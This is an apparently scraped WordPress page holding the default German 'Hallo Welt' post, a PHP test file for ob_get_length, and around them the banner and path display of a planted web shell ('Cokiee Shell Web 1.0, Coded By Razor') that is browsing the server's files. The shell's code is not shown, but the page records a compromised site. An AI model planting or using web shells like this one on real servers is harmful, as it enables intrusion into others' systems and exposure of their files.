Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/tests/output/ |
Current File : //usr/local/src/php7/php-7.0.5/tests/output/ob_get_length_error_001.phpt |
--TEST-- Test wrong number of arguments for ob_get_length() --FILE-- <?php /* * proto int ob_get_length(void) * Function is implemented in main/output.c */ $extra_arg = 1; echo "\nToo many arguments\n"; var_dump(ob_get_length($extra_arg)); ?> --EXPECTF-- Too many arguments Warning: ob_get_length() expects exactly 0 parameters, 1 given in %s on line 10 NULL
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare